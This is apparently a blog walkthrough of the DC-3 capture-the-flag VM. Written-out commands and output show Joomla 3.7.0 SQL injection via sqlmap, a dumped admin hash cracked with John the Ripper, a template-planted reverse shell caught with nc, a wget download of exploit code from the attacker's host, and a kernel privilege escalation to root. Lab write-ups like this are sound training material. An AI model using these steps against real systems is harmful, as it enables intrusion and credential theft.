We first start off with an nmap scan on the remote host.
root@ubuntu:~/src# nmap -p- -T5 192.168.56.102 Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-01 13:24 MDT Warning: 192.168.56.102 giving up on port because retransmission cap hit (2). Stats: 0:02:35 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 99.99% done; ETC: 13:27 (0:00:00 remaining) Nmap scan report for symfonos.local (192.168.56.102) Host is up (0.00073s latency). Not shown: 65529 closed ports PORT STATE SERVICE 80/tcp open http MAC Address: 08:00:27:1C:53:6A (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 185.63 seconds root@ubuntu:~/src#
NMAP came back with only port 80 open. Our next task is to fire up nikto and run it against the host.
root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.102 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.56.102 + Target Hostname: 192.168.56.102 + Target Port: 80 + Start Time: 2019-11-01 13:28:46 (GMT-6) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch. + IP address found in the 'location' header. The IP is "127.0.1.1". + OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1". + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + DEBUG HTTP verb may show server debugging information. See https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017 for details. + OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval. + OSVDB-3092: /administrator/: This might be interesting. + OSVDB-3092: /bin/: This might be interesting. + OSVDB-3092: /includes/: This might be interesting. + OSVDB-3092: /tmp/: This might be interesting. + OSVDB-3092: /LICENSE.txt: License file found may identify site software. + OSVDB-3233: /icons/README: Apache default file found. + /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed. + /administrator/index.php: Admin login page/section found. + 8757 requests: 0 error(s) and 17 item(s) reported on remote host + End Time: 2019-11-01 13:29:50 (GMT-6) (64 seconds) --------------------------------------------------------------------------- + 1 host(s) tested root@ubuntu:~/src/nikto/program#
Nikto came back with some intresting results. We check some of the directories in the output and find that this is a server running the Joomla CMS software. We hit the site with joomscan next. After running joomscan we find out the version is Joomla 3.7.0. We move on to searchsploit to see if there are any exploits for this version of joomla
root@ubuntu:~/src/exploitdb# ./searchsploit joomla 3.7.0
------------------------------------------------------------------------------------------------------------- -------------------------------------------
Exploit Title | Path
| (/home/sam/src/exploitdb/)
------------------------------------------------------------------------------------------------------------- -------------------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection | exploits/php/webapps/42033.txt
------------------------------------------------------------------------------------------------------------- -------------------------------------------
Shellcodes: No Result
root@ubuntu:~/src/exploitdb#
There is one vulnerablity available for this version of joomla if we read the exploit file we find the following:
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
It gives us instructions for running sqlmap against the host so we will use the example in the exploit file.
./sqlmap.py -u "http://192.168.56.102/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] [13:52:22] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL >= 5.1 [13:52:22] [INFO] fetching database names [13:52:23] [INFO] used SQL query returns 5 entries [13:52:23] [INFO] retrieved: 'information_schema' [13:52:23] [INFO] retrieved: 'joomladb' [13:52:23] [INFO] retrieved: 'mysql' [13:52:23] [INFO] retrieved: 'performance_schema' [13:52:23] [INFO] retrieved: 'sys' available databases [5]:
We found 5 databases on the server its next time to extract tables for the joomladb database.
./sqlmap.py -u "http://192.168.56.102/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --tables joomladb Database: joomladb [76 tables] +------------------------------------------------------+ | #__assets | | #__associations | | #__banner_clients | | #__banner_tracks | | #__banners | | #__bsms_admin | | #__bsms_books | | #__bsms_comments | | #__bsms_locations | | #__bsms_mediafiles | | #__bsms_message_typ | | #__bsms_podcast | | #__bsms_series | | #__bsms_servers | | #__bsms_studies | | #__bsms_studytopics | | #__bsms_teachers | | #__bsms_templatecod | | #__bsms_templates | | #__bsms_timeset | | #__bsms_topics | | #__bsms_update | | #__categories | | #__contact_details | | #__content_frontpag | | #__content_rating | | #__content_types | | #__content | | #__contentitem_tag_ | | #__core_log_searche | | #__extensions | | #__fields_categorie | | #__fields_groups | | #__fields_values | | #__fields | | #__finder_filters | | #__finder_links_ter | | #__finder_links | | #__finder_taxonomy_ | | #__finder_taxonomy | | #__finder_terms_com | | #__finder_terms | | #__finder_tokens_ag | | #__finder_tokens | | #__finder_types | | #__jbsbackup_timese | | #__jbspodcast_times | | #__languages | | #__menu_types | | #__menu | | #__messages_cfg | | #__messages | | #__modules_menu | | #__modules | | #__newsfeeds | | #__overrider | | #__postinstall_mess | | #__redirect_links | | #__schemas | | #__session | | #__tags | | #__template_styles | | #__ucm_base | | #__ucm_content | | #__ucm_history | | #__update_sites_ext | | #__update_sites | | #__updates | | #__user_keys | | #__user_notes | | #__user_profiles | | #__user_usergroup_m | | #__usergroups | | #__users | | #__utf8_conversion | | #__viewlevels | +------------------------------------------------------+
We got back 76 tables but the one we are intrested in is the '#_users' table. We move next to extract the columns from the remote host.
./sqlmap.py -u "http://192.168.56.102/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --columns -D joomladb -T "#_users"
We get three columns from the users table: email,username and password for the admin of the site.
admin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
Our next task is to fire up JohnTheRipper and crack the hash we got from the database
root@ubuntu:~/src/JohnTheRipper/run# ./john --wordlist=/home/sam/wordlists/rockyou.txt /home/sam/joomla.txt Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 1024 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status snoopy (admin) 1g 0:00:00:03 DONE (2019-11-01 14:16) 0.3311g/s 47.68p/s 47.68c/s 47.68C/s mylove..sandra Use the "--show" option to display all of the cracked passwords reliably Session completed root@ubuntu:~/src/JohnTheRipper/run#
Now we can try and login to the admin interface on the joomla site.
Just like in wordpress if you are admin you can edit the php files in the templates folder. We are going to do that and add our reverse connect php code file to the index.php file of the theme template.
Once we saved the php file its time to click on the 'Template Preview' button the execute our reverse shell code and connect back to our kali box. We executed the template file through the preview function in the joomla cms and got a connect back to our kali box.
root@kali:~# nc -l -v -p 4444
listening on [any] 4444 ...
192.168.56.102: inverse host lookup failed: Unknown host
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 39464
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
06:23:02 up 1:00, 0 users, load average: 0.00, 0.04, 0.11
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-3:/$
We upgrade the shell and go off searching.
www-data@DC-3:/var/www/html$ cat /etc/passwd cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false messagebus:x:108:112::/var/run/dbus:/bin/false uuidd:x:109:113::/run/uuidd:/bin/false dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin dc3:x:1000:1000:dc3,,,:/home/dc3:/bin/bash www-data@DC-3:/var/www/html$
We see there is one user on the system 'dc-3' other than that there nothing intresting in the passwd file.
www-data@DC-3:/var/www/html$ find / -xdev -perm -4000 -type f 2>/dev/null find / -xdev -perm -4000 -type f 2>/dev/null /bin/ping6 /bin/ntfs-3g /bin/umount /bin/su /bin/fusermount /bin/mount /bin/ping /tmp/ebpf_mapfd_doubleput_exploit/suidhelper /usr/lib/snapd/snap-confine /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/i386-linux-gnu/lxc/lxc-user-nic /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/bin/passwd /usr/bin/newgidmap /usr/bin/gpasswd /usr/bin/sudo /usr/bin/pkexec /usr/bin/chsh /usr/bin/chfn /usr/bin/newuidmap /usr/bin/newgrp /usr/bin/at www-data@DC-3:/var/www/html$
We search for SUID able binaries on the system but find nothing that could help us escalate our privs so we move on to the kernel version information looking for a kernel exploit.
www-data@DC-3:/var/www/html$ uname -a uname -a Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux www-data@DC-3:/var/www/html$ www-data@DC-3:/var/www/html$ cat /etc/os-release cat /etc/os-release NAME="Ubuntu" VERSION="16.04 LTS (Xenial Xerus)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 16.04 LTS" VERSION_ID="16.04" HOME_URL="http://www.ubuntu.com/" SUPPORT_URL="http://help.ubuntu.com/" BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/" UBUNTU_CODENAME=xenial www-data@DC-3:/var/www/html$
We see the kernel version is 4.4.0-21 and running Ubuntu 16.04LTS lets fire up searchsploit and look for some possible exploits for this version of linux.
root@ubuntu:~/src/exploitdb# ./searchsploit ubuntu 16.04
------------------------------------------------------------------------------------------------------------------------------------ -------------------------------------------
Exploit Title | Path
| (/home/sam/src/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------ -------------------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution | exploits/linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation | exploits/linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download | exploits/linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation | exploits/linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Loc | exploits/linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation | exploits/linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps | exploits/linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read | exploits/linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit) | exploits/linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak | exploits/linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation | exploits/linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation | exploits/linux/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation | exploits/linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation | exploits/linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer | exploits/linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | exploits/linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | exploits/linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation | exploits/linux/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | exploits/linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP) | exploits/linux/local/47169.c
------------------------------------------------------------------------------------------------------------------------------------ -------------------------------------------
Shellcodes: No Result
root@ubuntu:~/src/exploitdb#
We find one that looks interesting, the Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation exploit. We download the exploit to the remote host and try and compile the exploit on the machine.
www-data@DC-3:/tmp$ wget http://192.168.56.1/~sam/exploit.tar wget http://192.168.56.1/~sam/exploit.tar --2019-11-02 06:52:42-- http://192.168.56.1/~sam/exploit.tar Connecting to 192.168.56.1:80... connected. HTTP request sent, awaiting response... 200 OK Length: 20480 (20K) [application/x-tar] Saving to: 'exploit.tar' exploit.tar 100%[===================>] 20.00K --.-KB/s in 0s 2019-11-02 06:52:42 (134 MB/s) - 'exploit.tar' saved [20480/20480] www-data@DC-3:/tmp$ ls ls exploit.tar systemd-private-268ff12d81824fca955ee00cf8f2944e-systemd-timesyncd.service-6lcYCc www-data@DC-3:/tmp$
We need to untar all of the files in the exploit archive before we can compile. After that all that left to do is compile the exploit and cross our fingers it works.
www-data@DC-3:/tmp$ tar xvf exploit.tar
tar xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
www-data@DC-3:/tmp$ cd ebpf_mapfd_doubleput_exploit
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ls -la
ls -la
total 28
drwxr-x--- 2 www-data www-data 4096 Apr 26 2016 .
drwxrwxrwt 9 root root 4096 Nov 2 06:53 ..
-rwxr-x--- 1 www-data www-data 155 Apr 26 2016 compile.sh
-rw-r----- 1 www-data www-data 4188 Apr 26 2016 doubleput.c
-rw-r----- 1 www-data www-data 2186 Apr 26 2016 hello.c
-rw-r----- 1 www-data www-data 255 Apr 26 2016 suidhelper.c
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ chmod +x compile.sh
chmod +x compile.sh
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ./compile.sh
./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$
We make the exploit file executable and run the exploit
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ chmod +x doubleput chmod +x doubleput www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ./doubleput ./doubleput starting writev woohoo, got pointer reuse writev returned successfully. if this worked, you'll have a root shell in <=60 seconds. suid file detected, launching rootshell... we have root privs now... root@DC-3:/tmp/ebpf_mapfd_doubleput_exploit# id uid=0(root) gid=0(root) groups=0(root),33(www-data) root@DC-3:/tmp/ebpf_mapfd_doubleput_exploit# whoami whoami root root@DC-3:/tmp/ebpf_mapfd_doubleput_exploit#
We got root! If we change directory to root we find the one and only flag
root@DC-3:/tmp/ebpf_mapfd_doubleput_exploit# cd /root
cd /root
root@DC-3:/root# ls -la
ls -la
total 32
drwx------ 2 root root 4096 Mar 26 2019 .
drwxr-xr-x 22 root root 4096 Mar 23 2019 ..
-rw------- 1 root root 67 Mar 26 2019 .bash_history
-rw-r--r-- 1 root root 3106 Oct 23 2015 .bashrc
-rw------- 1 root root 71 Mar 23 2019 .mysql_history
-rw-r--r-- 1 root root 148 Aug 18 2015 .profile
-rw------- 1 root root 2889 Mar 26 2019 .viminfo
-rw-r--r-- 1 root root 604 Mar 26 2019 the-flag.txt
root@DC-3:/root# cat the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order. :-)
I hope you've enjoyed this challenge as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!
root@DC-3:/root#
No comments:
Post a Comment